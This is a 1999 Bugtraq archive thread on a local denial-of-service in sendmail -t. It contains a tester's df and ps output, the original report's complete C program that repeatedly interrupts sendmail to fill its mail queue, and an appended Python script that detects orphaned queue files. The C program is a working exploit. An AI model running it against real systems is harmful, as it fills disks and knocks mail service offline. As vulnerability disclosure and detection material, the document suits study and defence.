Bugtraq mailing list archives

Re: Possible local DoS in sendmail


From: kuruption () CHA0S COM (KuRuPTioN)
Date: Thu, 1 Apr 1999 14:41:41 -0500


Well, this is very interesting... this is what I found by running this
binary for 30 seconds =)

Before:

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251   87681   199909     30%   /
# ps auwx | grep sendmail
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail: accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#

After (30 seconds running):

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  107548   180042     37%   /
(not too bad but another 30 seconds later another df)

Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  146235   141355     51%   /

# ps auwx | grep sendmail
mail     17144 70.5  0.4  1348   820  p1 R   11:35   0:48 /usr/sbin/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail: accepting connections on port 25
(sendmail kindly using 70% of my CPU)

# ls -l /var/spool/mqueue
total 115854
-rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 qfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 xfLAA17144

(once again a df)
# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  224734    62856     78%   /

and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  287590        0    100%   /
# ps auwx | grep sendmail
mail     17144 68.5  0.4  1348   820  p1 R   11:35   2:33 /usr/wrapped/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail: rejecting connections on port 25: min free: 100
#

People, this is no April Fools' joke =)

Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgp@24.3.181.22

|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQ () NETSPACE ORG]On Behalf Of Lukasz
|Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQ () NETSPACE ORG
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail run with the -t option does NOT block SIGINT ...
|At the moment while we are sending data to its stdin, when we press
|CTRL-C the process is killed, but the unfinished letter remains in the queue.
|It stays there quite long - long enough to fill up the partition on the
|disk where
|/var/spool/mqueue resides.
|When it happens, sendmail doesn't allow new connections - so it is a kind
|of DoS attack on this service.
|It has been tested on all new versions of sendmail up to the current one (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <stdlib.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/types.h>
| #include <sys/wait.h>
|
| #define DELAY 5              /* time in seconds needed to reach
|                                 MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| int main(void)
| {
|       FILE    *fd;
|       pid_t   pid;
|
|       for(;;) {
|               if(( pid = fork()) < 0) {
|                       perror( "fork");
|                       exit( 1);
|               } else if( pid == 0) {
|                       /* child: own process group, so the parent's
|                          kill(-pid) reaches the popen()ed sendmail too */
|                       setpgrp();
|                       if(( fd = popen( SM_PATH, "w")) == NULL) {
|                               fprintf( stderr, "popen error\n");
|                               exit( 1);
|                       }
|                       /* feed sendmail an endless message body */
|                       for(;;) fputc( 'A', fd);
|               } else {
|                       /* parent: wait DELAY seconds, then interrupt the
|                          whole child group and start over */
|                       sleep( DELAY);
|                       kill( (-1) * pid, SIGINT);
|                       fprintf( stdout, "next\n");
|                       wait( NULL);
|               }
|       }
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar                               K.K.I.
|http://noname.kki.krakow.pl/           lluzar () kki pl
|

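A check an administrator could run against the symptom shown in the listings above (a growing df file beside 0-byte qf and xf files in /var/spool/mqueue, and the "min free" refusal once the disk fills). This is an added example, not code from either post; it assumes the classic qf/df/xf naming with a shared queue id, and the sample queue it builds in a temp directory is constructed for the demonstration.

```python
import os
import shutil
import tempfile

def orphaned_data_files(queue_dir):
    """Return {queue_id: df_size} for df* files whose qf control file is
    missing or empty. For a message sendmail -t was still reading when it
    was interrupted, the df file keeps the bytes already written while qf
    and xf stay at 0 bytes, so an empty qf beside a df is the signal."""
    found = {}
    for name in sorted(os.listdir(queue_dir)):
        if not name.startswith("df"):
            continue
        qid = name[2:]
        qf = os.path.join(queue_dir, "qf" + qid)
        qf_size = os.path.getsize(qf) if os.path.exists(qf) else -1
        if qf_size <= 0:
            found[qid] = os.path.getsize(os.path.join(queue_dir, name))
    return found

def below_min_free(path, min_free_kb=100):
    """True when free space on the filesystem holding `path` is under the
    threshold; mirrors the 'min free: 100' refusal seen in the ps output."""
    st = os.statvfs(path)
    return st.f_bavail * st.f_frsize // 1024 < min_free_kb

def populate_sample_queue(queue_dir):
    """Constructed sample: one interrupted message like the listing above
    (df with data, qf and xf empty) and one normally queued message."""
    with open(os.path.join(queue_dir, "dfLAA17144"), "wb") as f:
        f.write(b"A" * 4096)
    open(os.path.join(queue_dir, "qfLAA17144"), "wb").close()
    open(os.path.join(queue_dir, "xfLAA17144"), "wb").close()
    with open(os.path.join(queue_dir, "dfMAA20001"), "wb") as f:
        f.write(b"hello\n")
    with open(os.path.join(queue_dir, "qfMAA20001"), "wb") as f:
        f.write(b"V3\nS<user@example.invalid>\n")  # constructed control file

def check_sample():
    """Build the constructed queue in a temp dir, scan it, clean up."""
    queue_dir = tempfile.mkdtemp()
    try:
        populate_sample_queue(queue_dir)
        return orphaned_data_files(queue_dir)
    finally:
        shutil.rmtree(queue_dir)

if __name__ == "__main__":
    print(check_sample())  # {'LAA17144': 4096}
```

Pointing `orphaned_data_files` at the real queue directory from cron, and alerting when it returns anything or when `below_min_free` trips, gives warning well before sendmail starts rejecting connections.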

